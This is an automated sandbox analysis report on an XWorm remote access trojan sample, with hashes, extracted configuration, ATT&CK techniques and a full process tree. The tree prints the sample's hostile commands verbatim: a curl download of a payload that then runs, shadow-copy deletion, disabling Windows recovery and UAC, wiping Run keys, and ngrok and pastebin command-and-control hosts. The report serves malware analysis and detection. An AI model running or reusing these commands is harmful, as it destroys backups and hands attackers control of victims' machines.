xworm | 1e3b4846c9c304c0ea408381e99c1f80940cdd7e3d30170afd23ab492bfd5d13

Resubmissions

21-05-2024 16:26

240521-txyqyabf56 10

21-05-2024 16:11

21-05-2024 16:06

21-05-2024 16:02

21-05-2024 15:59

Analysis

max time kernel
135s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
21-05-2024 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.exe
Size

32KB
MD5

796d46d24a498cbd5c0161979b6b97ae
SHA1

0bad45e27d99ab1900cbb99bd97895c2286f7c53
SHA256

1e3b4846c9c304c0ea408381e99c1f80940cdd7e3d30170afd23ab492bfd5d13
SHA512

0046a95e056a3e7385d46fd383e3bc48b0b6891726d2dbcb2901139af5c9d1a3bb415446fc236b68cbf0a87cc13185f6fb2604447f02228c9c1f92f67a0593d4
SSDEEP

384:5YxRXcrP31VZBELRUnvJff3cdiwOURJpkFTBLToOZwxJd2v99IkuisuVFxOjhlbD:lPjgRevJ3cdIUGF/9jTOjhlbD

Score

10^/10

xworm defense_evasion execution impact persistence pyinstaller ransomware rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

ee7Mn1pG1AADdFhL

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/LY8grq3Z

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4264-1-0x0000000000850000-0x000000000085E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies Installed Components in the registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ie4uinit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe

Executes dropped EXE 23 IoCs

Processes:

qyzcmc.exeigdpri.exeajyjeq.exeStart.execurl.exeDriver.execlown.exestartban.exedef.exestartcur.exestartkey.exeban.exeDisDef.exeban.execur.exekey.exe7z.exestartdelstartup.exestartuac.exestartauto.exestartWinlog.exestartExplorerIcons.exestarticons.exe

pid	process
332	qyzcmc.exe
4744	igdpri.exe
3108	ajyjeq.exe
2132	Start.exe
1432	curl.exe
2396	Driver.exe
4144	clown.exe
3100	startban.exe
2128	def.exe
3404	startcur.exe
2924	startkey.exe
1724	ban.exe
3920	DisDef.exe
4516	ban.exe
4564	cur.exe
2904	key.exe
4728	7z.exe
1844	startdelstartup.exe
2856	startuac.exe
3324	startauto.exe
4932	startWinlog.exe
908	startExplorerIcons.exe
1656	starticons.exe

Loads dropped DLL 8 IoCs

Processes:

ban.exe7z.exe

pid process

4516 ban.exe
4516 ban.exe
4516 ban.exe
4516 ban.exe
4516 ban.exe
4516 ban.exe
4516 ban.exe
4728 7z.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 0.tcp.eu.ngrok.io
2 pastebin.com
1 pastebin.com

pid	process
4516	ban.exe
4516	ban.exe
4516	ban.exe
4516	ban.exe
4516	ban.exe
4516	ban.exe
4516	ban.exe
4728	7z.exe

flow	ioc
1	0.tcp.eu.ngrok.io
2	pastebin.com
1	pastebin.com

Drops file in System32 directory 2 IoCs

Processes:

ReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Drops file in Windows directory 12 IoCs

Processes:

ReAgentc.exeReAgentc.exeReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\java\ban\ban.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 8 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1564 timeout.exe
644 timeout.exe
1268 timeout.exe
4168 timeout.exe
4220 timeout.exe
5252 timeout.exe
1420 timeout.exe
3824 timeout.exe

pid	process
1564	timeout.exe
644	timeout.exe
1268	timeout.exe
4168	timeout.exe
4220	timeout.exe
5252	timeout.exe
1420	timeout.exe
3824	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3128 taskkill.exe
4044 taskkill.exe

pid	process
3128	taskkill.exe
4044	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

ie4uinit.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133607825530555485"	chrome.exe

Modifies registry class 1 IoCs

Processes:

XClient.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings XClient.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2192 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

chrome.exe

pid process

4580 chrome.exe
4580 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

4580 chrome.exe
4580 chrome.exe
4580 chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	XClient.exe

pid	process
2192	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

XClient.exetaskkill.exechrome.exeWMIC.exevssvc.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	4264	XClient.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeIncreaseQuotaPrivilege	2336	WMIC.exe
Token: SeSecurityPrivilege	2336	WMIC.exe
Token: SeTakeOwnershipPrivilege	2336	WMIC.exe
Token: SeLoadDriverPrivilege	2336	WMIC.exe
Token: SeSystemProfilePrivilege	2336	WMIC.exe
Token: SeSystemtimePrivilege	2336	WMIC.exe
Token: SeProfSingleProcessPrivilege	2336	WMIC.exe
Token: SeIncBasePriorityPrivilege	2336	WMIC.exe
Token: SeCreatePagefilePrivilege	2336	WMIC.exe
Token: SeBackupPrivilege	2336	WMIC.exe
Token: SeRestorePrivilege	2336	WMIC.exe
Token: SeShutdownPrivilege	2336	WMIC.exe
Token: SeDebugPrivilege	2336	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2336	WMIC.exe
Token: SeRemoteShutdownPrivilege	2336	WMIC.exe
Token: SeUndockPrivilege	2336	WMIC.exe
Token: SeManageVolumePrivilege	2336	WMIC.exe
Token: 33	2336	WMIC.exe
Token: 34	2336	WMIC.exe
Token: 35	2336	WMIC.exe
Token: 36	2336	WMIC.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeIncreaseQuotaPrivilege	2336	WMIC.exe
Token: SeSecurityPrivilege	2336	WMIC.exe
Token: SeTakeOwnershipPrivilege	2336	WMIC.exe
Token: SeLoadDriverPrivilege	2336	WMIC.exe
Token: SeSystemProfilePrivilege	2336	WMIC.exe
Token: SeSystemtimePrivilege	2336	WMIC.exe
Token: SeProfSingleProcessPrivilege	2336	WMIC.exe
Token: SeIncBasePriorityPrivilege	2336	WMIC.exe
Token: SeCreatePagefilePrivilege	2336	WMIC.exe
Token: SeBackupPrivilege	2336	WMIC.exe
Token: SeRestorePrivilege	2336	WMIC.exe
Token: SeShutdownPrivilege	2336	WMIC.exe
Token: SeDebugPrivilege	2336	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2336	WMIC.exe
Token: SeRemoteShutdownPrivilege	2336	WMIC.exe
Token: SeUndockPrivilege	2336	WMIC.exe
Token: SeManageVolumePrivilege	2336	WMIC.exe
Token: 33	2336	WMIC.exe
Token: 34	2336	WMIC.exe
Token: 35	2336	WMIC.exe
Token: 36	2336	WMIC.exe
Token: SeBackupPrivilege	3844	vssvc.exe
Token: SeRestorePrivilege	3844	vssvc.exe
Token: SeAuditPrivilege	3844	vssvc.exe
Token: SeShutdownPrivilege	4580	chrome.exe
Token: SeCreatePagefilePrivilege	4580	chrome.exe
Token: SeRestorePrivilege	4728	7z.exe
Token: 35	4728	7z.exe
Token: SeSecurityPrivilege	4728	7z.exe
Token: SeSecurityPrivilege	4728	7z.exe
Token: SeShutdownPrivilege	4580	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

chrome.exe

pid	process
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe
4580	chrome.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

Start.execurl.exeDriver.execlown.exestartban.exedef.exestartkey.exestartcur.exeban.exeDisDef.exeban.exekey.exe7z.exestartdelstartup.exestartuac.exestartauto.exestartExplorerIcons.exestartWinlog.exestarticons.exe

pid	process
2132	Start.exe
1432	curl.exe
2396	Driver.exe
4144	clown.exe
3100	startban.exe
2128	def.exe
2924	startkey.exe
3404	startcur.exe
1724	ban.exe
3920	DisDef.exe
4516	ban.exe
4516	ban.exe
2904	key.exe
4728	7z.exe
1844	startdelstartup.exe
2856	startuac.exe
3324	startauto.exe
908	startExplorerIcons.exe
4932	startWinlog.exe
1656	starticons.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

XClient.exeqyzcmc.exeigdpri.execmd.execmd.execmd.exeajyjeq.exeStart.execmd.exechrome.exe

description	pid	process	target process
PID 4264 wrote to memory of 332	4264	XClient.exe	qyzcmc.exe
PID 4264 wrote to memory of 332	4264	XClient.exe	qyzcmc.exe
PID 4264 wrote to memory of 332	4264	XClient.exe	qyzcmc.exe
PID 332 wrote to memory of 768	332	qyzcmc.exe	cmd.exe
PID 332 wrote to memory of 768	332	qyzcmc.exe	cmd.exe
PID 4264 wrote to memory of 4744	4264	XClient.exe	igdpri.exe
PID 4264 wrote to memory of 4744	4264	XClient.exe	igdpri.exe
PID 4264 wrote to memory of 4744	4264	XClient.exe	igdpri.exe
PID 4744 wrote to memory of 3492	4744	igdpri.exe	cmd.exe
PID 4744 wrote to memory of 3492	4744	igdpri.exe	cmd.exe
PID 768 wrote to memory of 1652	768	cmd.exe	ReAgentc.exe
PID 768 wrote to memory of 1652	768	cmd.exe	ReAgentc.exe
PID 768 wrote to memory of 1564	768	cmd.exe	timeout.exe
PID 768 wrote to memory of 1564	768	cmd.exe	timeout.exe
PID 3492 wrote to memory of 644	3492	cmd.exe	timeout.exe
PID 3492 wrote to memory of 644	3492	cmd.exe	timeout.exe
PID 3492 wrote to memory of 3128	3492	cmd.exe	taskkill.exe
PID 3492 wrote to memory of 3128	3492	cmd.exe	taskkill.exe
PID 4264 wrote to memory of 2236	4264	XClient.exe	cmd.exe
PID 4264 wrote to memory of 2236	4264	XClient.exe	cmd.exe
PID 2236 wrote to memory of 3528	2236	cmd.exe	ReAgentc.exe
PID 2236 wrote to memory of 3528	2236	cmd.exe	ReAgentc.exe
PID 2236 wrote to memory of 1268	2236	cmd.exe	timeout.exe
PID 2236 wrote to memory of 1268	2236	cmd.exe	timeout.exe
PID 4264 wrote to memory of 3808	4264	XClient.exe	WScript.exe
PID 4264 wrote to memory of 3808	4264	XClient.exe	WScript.exe
PID 768 wrote to memory of 4168	768	cmd.exe	timeout.exe
PID 768 wrote to memory of 4168	768	cmd.exe	timeout.exe
PID 4264 wrote to memory of 3108	4264	XClient.exe	ajyjeq.exe
PID 4264 wrote to memory of 3108	4264	XClient.exe	ajyjeq.exe
PID 4264 wrote to memory of 3108	4264	XClient.exe	ajyjeq.exe
PID 3108 wrote to memory of 2132	3108	ajyjeq.exe	Start.exe
PID 3108 wrote to memory of 2132	3108	ajyjeq.exe	Start.exe
PID 3108 wrote to memory of 2132	3108	ajyjeq.exe	Start.exe
PID 2132 wrote to memory of 3104	2132	Start.exe	cmd.exe
PID 2132 wrote to memory of 3104	2132	Start.exe	cmd.exe
PID 3104 wrote to memory of 1432	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1432	3104	cmd.exe	curl.exe
PID 768 wrote to memory of 4220	768	cmd.exe	timeout.exe
PID 768 wrote to memory of 4220	768	cmd.exe	timeout.exe
PID 4580 wrote to memory of 3584	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3584	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe
PID 4580 wrote to memory of 3424	4580	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264

C:\Users\Admin\AppData\Local\Temp\qyzcmc.exe
"C:\Users\Admin\AppData\Local\Temp\qyzcmc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D9C6.tmp\D9C7.tmp\D9C8.bat C:\Users\Admin\AppData\Local\Temp\qyzcmc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\ReAgentc.exe
reagentc /disable
4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1652

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
4⤵
- Delays execution with timeout.exe
PID:1564

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
4⤵
- Delays execution with timeout.exe
PID:4168

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
4⤵
- Delays execution with timeout.exe
PID:4220

C:\java\hide.exe
C:\java\hide.exe
4⤵
PID:6092

C:\Windows\system32\timeout.exe
timeout -t 13 -nobreak
4⤵
- Delays execution with timeout.exe
PID:3824

C:\Users\Admin\AppData\Local\Temp\igdpri.exe
"C:\Users\Admin\AppData\Local\Temp\igdpri.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF8E.tmp\FF8F.tmp\FF90.bat C:\Users\Admin\AppData\Local\Temp\igdpri.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3492

C:\Windows\system32\timeout.exe
timeout -t 10 -nobreak
4⤵
- Delays execution with timeout.exe
PID:644

C:\Windows\system32\taskkill.exe
taskkill -f -im form.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lzvmdt.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\ReAgentc.exe
reagentc /disable
3⤵
- Drops file in Windows directory
PID:3528

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
3⤵
- Delays execution with timeout.exe
PID:1268

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hwgcmd.vbs"
2⤵
PID:3808

C:\Users\Admin\AppData\Local\Temp\ajyjeq.exe
"C:\Users\Admin\AppData\Local\Temp\ajyjeq.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3108

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287.tmp\288.tmp\289.bat C:\ProgramData\Drivers\Start.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3104

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1432

C:\ProgramData\Drivers\Driver.exe
"C:\ProgramData\Drivers\Driver.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2396

C:\java\protection\clown.exe
"C:\java\protection\clown.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48A8.tmp\48A9.tmp\48AA.bat C:\java\protection\clown.exe"
7⤵
PID:3792

C:\java\protection\start\startban.exe
C:\java\protection\start\startban.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3100

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4982.tmp\4983.tmp\4984.bat C:\java\protection\start\startban.exe"
9⤵
PID:1512

C:\java\ban\ban.exe
C:\java\ban\ban.exe
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1724

C:\java\ban\ban.exe
C:\java\ban\ban.exe
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4516

C:\java\protection\def.exe
C:\java\protection\def.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2128

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4963.tmp\4964.tmp\4965.bat C:\java\protection\def.exe"
9⤵
PID:3908

C:\java\protection\DisDef.exe
C:\java\protection\DisDef.exe /D
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3920

C:\java\protection\start\startcur.exe
C:\java\protection\start\startcur.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3404

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4992.tmp\4993.tmp\4994.bat C:\java\protection\start\startcur.exe"
9⤵
PID:3180

C:\java\ban\cur.exe
C:\java\ban\cur.exe
10⤵
- Executes dropped EXE
PID:4564

C:\java\protection\start\startkey.exe
C:\java\protection\start\startkey.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2924

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4983.tmp\4983.tmp\4984.bat C:\java\protection\start\startkey.exe"
9⤵
PID:2116

C:\java\ban\key.exe
C:\java\ban\key.exe
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2904

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DE7.tmp\4DE8.tmp\4DE9.bat C:\java\ban\key.exe"
11⤵
PID:4804

C:\Windows\system32\reg.exe
reg import C:\java\ban\key.reg
12⤵
PID:3176

C:\Windows\system32\ReAgentc.exe
reagentc /disable
8⤵
- Drops file in Windows directory
PID:3848

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete /nointeractive
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\java\zip\7z.exe
C:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4728

C:\java\protection\start\startdelstartup.exe
C:\java\protection\start\startdelstartup.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1844

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D68.tmp\5D69.tmp\5D6A.bat C:\java\protection\start\startdelstartup.exe"
9⤵
PID:4164

C:\java\protection\delstartup.exe
C:\java\protection\delstartup.exe
10⤵
PID:3984

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F3D.tmp\5F3E.tmp\5F3F.bat C:\java\protection\delstartup.exe"
11⤵
PID:5028

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
12⤵
PID:1532

C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f
12⤵
PID:1660

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f
12⤵
PID:5156

C:\java\protection\start\startuac.exe
C:\java\protection\start\startuac.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2856

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D88.tmp\5D88.tmp\5D89.bat C:\java\protection\start\startuac.exe"
9⤵
PID:2336

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:3920

C:\java\protection\uac.exe
C:\java\protection\uac.exe
10⤵
PID:1264

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6018.tmp\6028.tmp\6029.bat C:\java\protection\uac.exe"
11⤵
PID:4060

C:\Windows\system32\reg.exe
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
12⤵
- Modifies registry key
PID:2192

C:\java\protection\start\startauto.exe
C:\java\protection\start\startauto.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3324

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D87.tmp\5D88.tmp\5D89.bat C:\java\protection\start\startauto.exe"
9⤵
PID:4564

C:\java\protection\auto.exe
C:\java\protection\auto.exe
10⤵
PID:3332

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F0E.tmp\5F0F.tmp\5F10.bat C:\java\protection\auto.exe"
11⤵
PID:1956

C:\java\protection\start\startWinlog.exe
C:\java\protection\start\startWinlog.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4932

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5DA8.tmp\5DA8.tmp\5DA9.bat C:\java\protection\start\startWinlog.exe"
9⤵
PID:5108

C:\java\protection\Winlog.exe
C:\java\protection\Winlog.exe
10⤵
PID:4704

C:\java\protection\start\startExplorerIcons.exe
C:\java\protection\start\startExplorerIcons.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:908

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5DA7.tmp\5DA8.tmp\5DA9.bat C:\java\protection\start\startExplorerIcons.exe"
9⤵
PID:1416

C:\java\protection\ExplorerIcons.exe
C:\java\protection\ExplorerIcons.exe
10⤵
PID:352

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\618F.tmp\6190.tmp\6191.bat C:\java\protection\ExplorerIcons.exe"
11⤵
PID:1100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:2904

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3504

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5404

C:\Windows\system32\reg.exe
